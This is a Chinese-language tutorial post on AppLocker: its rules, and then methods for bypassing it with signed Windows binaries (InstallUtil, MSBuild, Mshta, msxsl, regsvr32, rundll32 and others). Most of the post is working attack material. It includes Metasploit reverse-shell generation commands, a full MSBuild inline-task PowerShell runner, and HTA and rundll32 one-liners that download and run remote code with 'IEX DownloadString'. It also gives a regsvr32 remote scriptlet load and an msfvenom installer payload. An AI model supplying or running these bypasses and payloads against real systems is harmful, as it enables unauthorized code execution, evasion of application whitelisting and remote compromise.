如何進(jìn)行AppLocker繞過(guò)分析

這篇文章給大家介紹如何進(jìn)行AppLocker繞過(guò)分析，內(nèi)容非常詳細(xì)，感興趣的小伙伴們可以參考借鑒，希望對(duì)大家能有所幫助。

前言

什么是applocker

AppLocker即“應(yīng)用程序控制策略”，是Windows 7系統(tǒng)中新增加的一項(xiàng)安全功能。在win7以上的系統(tǒng)中默認(rèn)都集成了該功能，我們可以使用在services中啟用Application Identity，然后在local security policy中找到Application Control Policies中看到Applocker選項(xiàng)。

applocker規(guī)則

默認(rèn)的Applocker規(guī)則支持以下幾種：

規(guī)則** | 關(guān)聯(lián)的文件格式 ---|--- 可執(zhí)行文件  | .exe、.com 腳本 | .ps1、.bat、.cmd、.vbs、.js Windows Installer 文件 | .msi、.msp、.mst 封裝應(yīng)用和封裝應(yīng)用安裝程序 | .appx DLL 文件 | 　.dll、.ocx

.appx并不是所有的applocker都會(huì)存在，應(yīng)根據(jù)windows版本來(lái)，在win10上，創(chuàng)建applocker規(guī)則后會(huì)在C:\Windows\System32\AppLocker生產(chǎn)相應(yīng)的.applocker文件。

applocker規(guī)則條件

規(guī)則條件是用于幫助 AppLocker 標(biāo)識(shí)要應(yīng)用規(guī)則的應(yīng)用的標(biāo)準(zhǔn)。三個(gè)主要規(guī)則條件為發(fā)布者、路徑和文件哈希。

• 發(fā)布者：基于應(yīng)用的數(shù)字簽名標(biāo)識(shí)它
  

• 路徑：通過(guò)應(yīng)用在計(jì)算機(jī)文件系統(tǒng)中或網(wǎng)絡(luò)上的位置來(lái)標(biāo)識(shí)它
  

• 文件哈希：表示已標(biāo)識(shí)文件的系統(tǒng)計(jì)算的加密哈希
  

AppLocker 默認(rèn)規(guī)則

在你創(chuàng)建了一個(gè)applocker規(guī)則后，系統(tǒng)會(huì)默認(rèn)詢問(wèn)你是否添加一條默認(rèn)規(guī)則，如下圖所示：

每個(gè)規(guī)則所對(duì)應(yīng)的默認(rèn)規(guī)則如下：

可執(zhí)行的默認(rèn)規(guī)則類型包括：

• 允許本地 Administrators 組的成員運(yùn)行所有應(yīng)用。
  

• 允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的應(yīng)用。
  

• 允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的應(yīng)用。
  

腳本默認(rèn)規(guī)則類型包括：

• 允許本地 Administrators 組的成員運(yùn)行所有腳本。
  

• 允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的腳本。
  

• 允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的腳本。
  

Windows Installer 默認(rèn)規(guī)則類型包括：

• 允許本地 Administrators 組的成員運(yùn)行所有 Windows Installer 文件。
  

• 允許 Everyone 組的成員運(yùn)行所有已進(jìn)行數(shù)字簽名的 Windows Installer 文件。
  

• 允許 Everyone 組的成員運(yùn)行 Windows\Installer 文件夾中的所有 Windows Installer 文件。
  

DLL 默認(rèn)規(guī)則類型：

• 允許本地 Administrators 組的成員運(yùn)行所有 DLL。
  

• 允許 Everyone 組的成員運(yùn)行 Program Files 文件夾中的 DLL。
  

• 允許 Everyone 組的成員運(yùn)行 Windows 文件夾中的 DLL。
  

封裝應(yīng)用默認(rèn)規(guī)則類型：

• 允許 Everyone 組的成員安裝和運(yùn)行所有已簽名的封裝應(yīng)用和封裝應(yīng)用安裝程序
  

AppLocker 規(guī)則行為

可將規(guī)則配置為使用允許或拒絕操作：

• 允許。你可以指定允許在你的環(huán)境中運(yùn)行的文件以及所針對(duì)的用戶或用戶組。你還可以配置例外以標(biāo)識(shí)從規(guī)則中排除的文件。
  

• 拒絕。你可以指定 not 允許在你的環(huán)境中運(yùn)行的文件以及所針對(duì)的用戶或用戶組。你還可以配置例外以標(biāo)識(shí)從規(guī)則中排除的文件。
  

創(chuàng)建一個(gè)applocker規(guī)則

講了那么多，我們以禁止在桌面上運(yùn)行exe文件為例，創(chuàng)建一條規(guī)則。創(chuàng)建完大體如下：

運(yùn)行exe測(cè)試：

系統(tǒng)就會(huì)阻止我們運(yùn)行

bypass Applocker

Installutil.exe

InstallUtil是.NET Framework的一部分，是一個(gè)命令行程序，它使用戶可以通過(guò)命令提示符快速安裝和卸載應(yīng)用程序。由于此實(shí)用程序是Microsoft簽名的二進(jìn)制文件，因此可以用來(lái)繞過(guò)AppLocker限制來(lái)運(yùn)行任何.NET可執(zhí)行文件。該實(shí)用程序也位于Windows文件夾內(nèi)，該文件夾不會(huì)應(yīng)用AppLocker策略，因?yàn)樾枰獔?zhí)行Windows文件夾的內(nèi)容才能使系統(tǒng)正常運(yùn)行。

首先我們使用WhiteListEvasion(https://github.com/khr0x40sh/WhiteListEvasion)生成一個(gè)模板

python InstallUtil.py --cs_file pentestlab.cs --exe_file /root/Desktop/pentestlab.exe --payload windows/meterpreter/reverse_https --lhost 192.168.0.103 --lport 443

上面的命令將生成一個(gè)C＃模板，其中將包含Metasploit ShellCode。

將生成后的文件放到目標(biāo)中使用下面的方法執(zhí)行：

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U /root/payload.exe

當(dāng)然你也可以是先使用msf生成一個(gè)csharp的payload，然后替換模板中的shellcode，然后將cs文件傳到目標(biāo)機(jī)。

然后用csc編譯我們的腳本：

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe  /out:exeshell.exe exeshell.cs

此時(shí)我們執(zhí)行我們的文件試試：

被規(guī)則攔截，那么我們使用

C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe

繞過(guò)

msf成功上線

在msf中也有使用InstallUtil.exe進(jìn)行applocker的bypass模塊。

exploit/windows/local/applocker_bypass

原理是一樣的

附帶常見的路徑：

• C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  

• C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  

• C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  

• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
  

Msbuild.exe

MSBuild.exe（Microsoft Build Engine）是Visual Studio使用的軟件構(gòu)建平臺(tái)。它采用XML格式的項(xiàng)目文件，這些文件定義了構(gòu)建各種平臺(tái)和配置的要求。（引用：MSDN MSBuild）

我們可以使用MSBuild通過(guò)受信任的Windows實(shí)用工具代理代碼執(zhí)行。.NET版本4中引入的MSBuild內(nèi)聯(lián)任務(wù)功能允許將C＃代碼插入XML項(xiàng)目文件中。內(nèi)聯(lián)任務(wù)MSBuild將編譯并執(zhí)行內(nèi)聯(lián)任務(wù)。MSBuild.exe是一個(gè)經(jīng)過(guò)簽名的Microsoft二進(jìn)制文件，因此，以這種方式使用它時(shí)，它可以執(zhí)行任意代碼，并繞過(guò)配置為允許MSBuild.exe執(zhí)行的應(yīng)用程序白名單防護(hù).

我們這里直接使用GreatSCT生成一個(gè)xml文件。

./GreatSCT.py --ip 192.168.0.106 --port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py

并且會(huì)給我們生成一個(gè)rc文件，我們可以使用msfconsole -r 直接啟動(dòng)msf

然后使用msbuild執(zhí)行，

msf上線：

當(dāng)然你也可以是使用msf生成一個(gè)c#的shellcode然后使用三好學(xué)生師傅的模板加載：

https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml

注意將后綴名改為.csproj

除了反彈shell以外我們還可以用它來(lái)繞過(guò)powershell的限制。

代碼如下：

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">  <!-- This inline task executes c# code. -->  <!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe pshell.xml -->   <!-- Author: Casey Smith, Twitter: @subTee -->  <!-- License: BSD 3-Clause -->  <Target Name="Hello">   <FragmentExample />   <ClassExample />  </Target>  <UsingTask    TaskName="FragmentExample"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><ParameterGroup/><Task>  <Using Namespace="System" />  <Using Namespace="System.IO" />  <Code Type="Fragment" Language="cs"><![CDATA[                Console.WriteLine("Hello From Fragment");        ]]>  </Code></Task></UsingTask><UsingTask    TaskName="ClassExample"    TaskFactory="CodeTaskFactory"    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" ><Task>  <Reference Include="System.Management.Automation" />  <Code Type="Class" Language="cs"><![CDATA[            using System;            using System.IO;            using System.Diagnostics;            using System.Reflection;            using System.Runtime.InteropServices;            //Add For PowerShell Invocation            using System.Collections.ObjectModel;            using System.Management.Automation;            using System.Management.Automation.Runspaces;            using System.Text;            using Microsoft.Build.Framework;            using Microsoft.Build.Utilities;            public class ClassExample :  Task, ITask            {                public override bool Execute()                {                    while(true)                    {                        Console.Write("PS >");                        string x = Console.ReadLine();                        try                        {                            Console.WriteLine(RunPSCommand(x));                        }                        catch (Exception e)                        {                            Console.WriteLine(e.Message);                        }                    }                                return true;                }                //Based on Jared Atkinson's And Justin Warner's Work                public static string RunPSCommand(string cmd)                {                    //Init stuff                    Runspace runspace = RunspaceFactory.CreateRunspace();                    runspace.Open();                    RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);                    Pipeline pipeline = runspace.CreatePipeline();                    //Add commands                    pipeline.Commands.AddScript(cmd);                    //Prep PS for string output and invoke                    pipeline.Commands.Add("Out-String");                    Collection<PSObject> results = pipeline.Invoke();                    runspace.Close();                    //Convert records to strings                    StringBuilder stringBuilder = new StringBuilder();                    foreach (PSObject obj in results)                    {                        stringBuilder.Append(obj);                    }                    return stringBuilder.ToString().Trim();                 }                 public static void RunPSFile(string script)                {                    PowerShell ps = PowerShell.Create();                    ps.AddScript(script).Invoke();                }            }        ]]>  </Code></Task>  </UsingTask> </Project>

原地址：https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml

成功繞過(guò)對(duì)powershell的限制。

常見路徑如下：

• C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
  

• C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
  

• C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
  

• C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
  

• C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
  

• C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
  

Mshta.exe

mshta.exe是微軟Windows操作系統(tǒng)相關(guān)程序，英文全稱Microsoft HTML Application，可翻譯為微軟超文本標(biāo)記語(yǔ)言應(yīng)用，用于執(zhí)行.HTA文件。默認(rèn)已集成在環(huán)境變量中。

使用Mshta的方式有很多，我們這里使用msf的exploit/windows/misc/hta_server模塊進(jìn)行測(cè)試：

use exploit/windows/misc/hta_server msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109 msf exploit(windows/misc/hta_server) > exploit

目標(biāo)機(jī)執(zhí)行：

mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta

即可上線。

除了這種方法hta還可以使用cobaltstrike 、Setoolkit、Magic unicorn、Empire、CactusTorch、Koadic、Great SCT等進(jìn)行上線。

除了本地文件，mshta還支持遠(yuǎn)程下載的方式執(zhí)行payload，比如：

mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();

除了以上的方式，mshta可以用用來(lái)執(zhí)行powershell：

<HTML> <HEAD> <script language="VBScript">Set objShell = CreateObject("Wscript.Shell")    objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')" </script> </HEAD> <BODY> </BODY> </HTML>

即使applocker已經(jīng)禁止powershell執(zhí)行了

InfDefaultInstall.exe

InfDefaultInstall.exe是一個(gè)用來(lái)進(jìn)行inf安裝的工具，具有微軟簽名，存在路徑為：

• C:\Windows\System32\Infdefaultinstall.exe
  

• C:\Windows\SysWOW64\Infdefaultinstall.exe
  

我們也可以用它來(lái)繞過(guò)一些限制。用法就是直接該文件后面跟你的inf文件即可。

它的執(zhí)行流程如下：

作者給出的poc地址如下：

https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a

思路也和圖中那樣，使用shady.inf去調(diào)用遠(yuǎn)程的sct后門。

不過(guò)他的調(diào)用需要更高的權(quán)限，我在win10下運(yùn)行的截圖：

Mavinject.exe

Mavinject是win10上面自帶的windows組件，我們可以用它來(lái)進(jìn)行dll注入，并繞過(guò)部分限制。

用法如下：

mavinject32.exe <PID> <PATH DLL>

常見路徑如下：

• C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
  

• C:\Windows\System32\mavinject.exe
  

• C:\Windows\SysWOW64\mavinject.exe
  

但是我本地復(fù)現(xiàn)的時(shí)候并沒(méi)有成功注入，但是也沒(méi)有什么提示，不知道具體原因是什么，版本為：     10.0.15063.0 (WinBuild.160101.0800)

應(yīng)該是可以成功注入的，附上一張推特大佬成功的圖。

有興趣的可以多嘗試幾個(gè)系統(tǒng)。

MSIEXEC

MSIEXEC是Microsoft的應(yīng)用程序，可用于從命令行安裝或配置產(chǎn)品。這個(gè)其實(shí)不是很陌生的了，我之前也寫過(guò)用它來(lái)進(jìn)行提權(quán)的文章。我們假設(shè)可以執(zhí)行msi文件，用它來(lái)繞過(guò)applocker對(duì)powershell的限制。

先用msf生成一個(gè)msi文件。

msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi

windows下執(zhí)行：

成功繞過(guò)。

msxsl.exe

msxsl.exe是一個(gè)xml的轉(zhuǎn)換器，帶有微軟數(shù)字簽名。下載地址如下：

https://www.microsoft.com/en-us/download/details.aspx?id=21714

我們使用3gstudent來(lái)嘗試?yán)@過(guò)applocker對(duì)calc的限制，

customers.xml:

<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="script.xsl" ?> <customers>   <customer>  <name>John Smith</name>  <address>123 Elm St.</address>  <phone>(123) 456-7890</phone>   </customer>   <customer>  <name>Mary Jones</name>  <address>456 Oak Ave.</address>  <phone>(156) 789-0123</phone>   </customer> </customers>

script.xml:

<?xml version='1.0'?> <xsl:stylesheet version="1.0"      xmlns:xsl="http://www.w3.org/1999/XSL/Transform"      xmlns:msxsl="urn:schemas-microsoft-com:xslt"      xmlns:user="http://mycompany.com/mynamespace"> <msxsl:script language="JScript" implements-prefix="user">   function xml(nodelist) {    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");      return nodelist.nextNode().xml;   } </msxsl:script> <xsl:template match="/">   <xsl:value-of select="user:xml(.)"/> </xsl:template> </xsl:stylesheet>

成功繞過(guò)：

當(dāng)然也可以執(zhí)行我們的shellcode，具體參考：

https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml

Regsv***.exe

regsv***是Windows命令行實(shí)用程序，用于將.dll文件和ActiveX控件注冊(cè)和注銷到注冊(cè)表中。

文件位置：

• C:\Windows\System32\regsv***.exe
  

• C:\Windows\SysWOW64\regsv***.exe
  

下面為大家演示，繞過(guò)applocker上線。

scT文件內(nèi)容如下：

<?XML version="1.0"?> <scriptlet> <registration         progid="Pentest"       classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > <script language="JScript"> <![CDATA[   var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); ]]> </script> </registration> </scriptlet>

各參數(shù)的含義：

• 靜默不顯示任何消息// / s
  

• 不調(diào)用DLL注冊(cè)服務(wù)器// / n
  

• 要使用另一個(gè)IP地址，因?yàn)樗粫?huì)調(diào)用DLL注冊(cè)服務(wù)器// / i
  

• 使用取消注冊(cè)方法// / u
  

除了本地執(zhí)行，它還支持遠(yuǎn)程加載：

regsv*** /u /n /s /i:http://ip:port/payload.sct scrobj.dll

sct我們使用ＧreatSct生成即可。

Rundll32.exe

Rundll32是一個(gè)Microsoft二進(jìn)制文件，可以執(zhí)行DLL文件中的代碼。由于此實(shí)用程序是Windows操作系統(tǒng)的一部分，因此可以用作繞過(guò)AppLocker規(guī)則或軟件限制策略的方法

先生成我們的payload：

目標(biāo)機(jī)執(zhí)行： 　 　

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";
document.write();
new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

上線：

除了遠(yuǎn)程之外，也可以本地上線：

rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll

也可以用來(lái)繞過(guò)對(duì)某些軟件的限制，比如彈個(gè)cmd：

關(guān)于如何進(jìn)行AppLocker繞過(guò)分析就分享到這里了，希望以上內(nèi)容可以對(duì)大家有一定的幫助，可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò)，可以把它分享出去讓更多的人看到。